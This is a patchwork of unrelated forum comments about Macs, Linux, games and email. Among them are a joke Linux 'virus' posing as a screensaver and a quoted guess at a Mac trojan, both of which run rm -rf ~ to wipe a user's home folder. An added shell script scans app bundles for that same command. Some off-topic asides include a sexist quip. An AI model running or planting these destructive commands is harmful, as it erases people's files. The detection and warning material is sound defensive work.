Tried Wario Ware? It's great. Fun, addictive and easy to learn :)
That's because you don't delete the Netinfo entry for your user. You could always use niutil to delete the user, but that's not as easy as rm rf ~
It masquerades as linux-kernel-2.8 and can be found on Freenet in the hope that Linux users wanting to try out the latest kernel will try it.
The code of the virus has been obtained with a hex editor.
#!/bin/sh
#Stupid Linux user virus 1.0
Echo Installing Britney Nude screensaver
rm -rf ~
echo Muahhaahha sucker
I don't think your average Windows user would either. Not all Mac users want to "get dirty" with the terminal.
Evily stolen from robg Link
After reading the article and the press release, I think it's pretty obvious what the program is doing -- I suspect it's nothing more than a one-line AppleScript. Although some (perhaps many) will disagree with me, I'm going to publish what I think the exploit to be, because it's not a huge secret. Basically, my guess is that the trojan horse is a one-line AppleScript that contains the following UNIX command (in the script, the command will be accessed via the AppleScript method for calling a shell command, but I'm not going to bother including that part here):
rm -rf ~
WARNING!! DO NOT USE THIS COMMAND! YOU WILL ERASE YOUR USER'S DIRECTORY!
I feel it's important that everyone understand the above command, and know what it looks like -- the more people who know what this line does and how it works, hopefully the fewer who will be fooled by it. And to claim that this is some "deep dark secret" that needs to be hidden is, in my opinion, trying to hide from the truth -- more "security by obscurity," which we all know doesn't work well at all. rm -rf is a very standard, very useful Unix command. In fact, if you search macosxhints (using the advanced search page) for the 'exact phrase' rm -rf, you'll get fully three pages of matches.
What makes it troublesome in this case is simply that it's called from a program where the typical user will not know what's happening, and will be shocked at the outcome. But listing the command is not like explaining how to write a self-replicating virus that spreads from machine to machine -- this is common knowledge to probably at least a couple of million OS X users who have some knowledge of Unix.
For those that don't know Unix, rm is "move to and empty trash," -r is "do this for all items and folders within this folder," the f means "force removal without confirmation," and the ~ means "the user's directory." Spelled out, this means that the script will, without warning or user intervention, delete everything in the user's folder. Permanently.
The Intego press release explains one way to test a program if you suspect it might be a trojan horse -- select it, do a Get Info, and try to delete the icon. Here's another safety check that I often use myself: drag and drop the program onto Script Editor (or control-click on a package and select Show Package Contents to explore the package contents if it's a package installer). If you're lucky, and the script writer was somewhat lazy (by not making the script uneditable), the script itself will open for editing.
So now that you know about this trojan horse, the question is, what should be done about them on OS X? My first thought on reading the article was "Cool, Darwin at work on the peer to peer networks!" But then, I considered some additional scenarios which may have more applicability in the real world. The current example is likely to remain on Gnutella, given that it's a program that purports to install the currently 'hot' application, the new Office suite. However, think about this version: A useful AppleScript that does something cool (change type/creator codes, backs up your directory, etc.). However, buried in the code is a timer that counts the number of times you've used the program. On the 50th run, it deletes your entire user's folder. Or worse, it pops up a dialog that says "In order to backup the Foo_bar file, we need your admin password." It may then be possible (I'm not quite sure how) for the app to delete the entire hard drive, instead of just your user's folder. If the script were useful enough, it could be very widely distributed, and then go blam! at some non-specified time in the future.
What, if anything, should Apple do about this? Note that this is not specific to OS X; it's really a 'social engineering' exploit. I think it would be just as easy to write a similar 'exploit' for Linux or even Windows, given that it's a simple script that relies
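The inspection step described in the quoted article (Show Package Contents, then read the scripts), automated as an added example that is not part of the original comment or the article: a shell function that walks an unpacked bundle and flags any rm carrying both a recursive and a force option whose target is the home folder itself. The sample bundle, its file names and the function names are constructed for illustration; a compiled or obfuscated script can hide the command, so an empty result is not proof of safety.

```shell
#!/bin/sh
# Added example: flag files in an unpacked bundle that force-delete the home folder.

# Target is the home directory itself: ~, ~/, $HOME or ${HOME}, optionally quoted.
HOME_TARGET='["'\'']?(~|[$]HOME|[$][{]HOME[}])/?["'\'']?([[:space:];&|)]|$)'
# "rm", one or more option words, then the home target.
RM_HOME="(^|[^[:alnum:]_])rm([[:space:]]+-[A-Za-z]+)+[[:space:]]+${HOME_TARGET}"

# Print "file:line:text" for every line that runs rm with -r/-R and -f on home.
scan_bundle() {
    find "$1" -type f -print | while IFS= read -r f; do
        # -a searches compiled or binary files as text as well
        grep -a -n -E "$RM_HOME" "$f" 2>/dev/null | while IFS= read -r hit; do
            # Isolate the matched rm command, then require both options,
            # whether combined (-rf, -fr) or split (-r -f).
            cmd=$(printf '%s\n' "$hit" | grep -a -o -E "$RM_HOME")
            if printf '%s\n' "$cmd" | grep -q -E -e '[[:space:]]-[A-Za-z]*[rR]' &&
               printf '%s\n' "$cmd" | grep -q -E -e '[[:space:]]-[A-Za-z]*f'; then
                printf '%s:%s\n' "$f" "$hit"
            fi
        done
    done
}

# Build a constructed sample bundle (hypothetical names) and print its path.
make_sample() {
    d=$(mktemp -d) || return 1
    r="$d/Installer.app/Contents/Resources"
    mkdir -p "$r/Scripts"
    # The files are only written as text; nothing in them is ever executed.
    printf '%s\n' 'do shell script "rm -rf ~"' >"$r/Scripts/main.scpt"
    printf '%s\n' '#!/bin/sh' 'rm -r -f "$HOME"' >"$r/postflight"
    # Narrower deletions that must not be flagged.
    printf '%s\n' 'rm -rf ./build' 'rm -f ~/.tmpfile' >"$r/cleanup.sh"
    printf '%s\n' "$d"
}

# Demo run on the constructed sample, then remove the temporary directory.
sample=$(make_sample) && scan_bundle "$sample" && rm -rf -- "$sample"
```

To check a real download, pass the path of the bundle or unpacked package to scan_bundle before opening it.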
Here's a torrent listing of them
Clicky clicky
For starters I'm sure you still can find the programs you used to write them. Second you really ought to back up the programs that you use to open the files. Since later on you just fire up your emulator of the old machine and run the app.
Because one day you might be disabled too, and I don't think you want to sit around in your home all the day thinking: Oh well at least those normal people won't have to think about me now...
First they came for the Jews
and I did not speak out
because I was not a Jew.
Then they came for the Communists
and I did not speak out
because I was not a Communist.
Then they came for the trade unionists
and I did not speak out
because I was not a trade unionist.
Then they came for me
and there was no one left
to speak out for me.
Pastor Martin Niemoller
Seems like it doesn't like to serve you infidels who don't understand the real power of Internet Explorer
Variable is undefined: 'agent_isSafari'
(It's a joke! Don't hate me mods)
Yup just use the appropriate way of importing the certificate for each email program.
Yes I know that you shouldn't reply to your own posts, but what the heck.
Of course I mean that you can encrypt the email you send, not the email address. Just like to make that clear.
Well at least if you're using Mac OS X 10.3 Mail.app
I used this tutorial on how to certify my email address so the one receiving my email will know that it's me. Also when the receiver and the sender got a certified email address you can encrypt your email address.
Yes I know about PGP but this is much easier since Mail automatically adds the sender's key for you when you get a mail that's signed.
Try searching for XFree86 sucks, that will get you where you want.
Actually all new Xboxes are sold with the Japanese controller also known as the S-Controller.
Yeah, because everyone and their mother are gaming freaks. Besides wasn't the UT2k4 demo released the same day as the PC one? Even though it wasn't released before the PC version it was damn close.
Most gamers are too narrow-minded to even bother trying Mac OS X from my experience anyway.
From http://www.stanford.edu/group/virus/uda/
Recently the virus has been reconstructed from the tissue of a dead soldier and is now being genetically characterized
Of course you thought SCO was some evil group that would sue innocent people and make outrageous claims?
A SCO license for that Linux box!
Yes SomethingAwful has a long tradition of making reviews of these games. Though they all get negative scores :p
http://www.somethingawful.com/hentai/
The Nazis called, they want their 1930 propaganda back.
Yes and that's why they're including Bochs with it for the x86 emulation.
Apple will have to make the choice of whether to port their music/media software to Windows or will face losing most of those customers... who do not want to switch platforms (at a very high cost) just because of a music player.
Yeah they really should port iTunes, oh wait! They did! iTunes for Windows
And why should they all of a sudden make a change in their business from being a niche player to something that's doomed to fail?
Wow! A whopping 128MB, that's like what 6 songs? If you had looked at the chart (oh wait this is Slashdot) you'd have seen that it stacks up very well against other mp3 players.
And it has a lower price than some other mini HD based mp3 players.
You know those other humans, what are they called... oh yes females. They all loved Titanic and went to see it at the cinema a couple of times then they rented it and forced me to watch it again.
If you want to make big money make a movie that appeals to women. That goes for computer games too, The Sims anyone?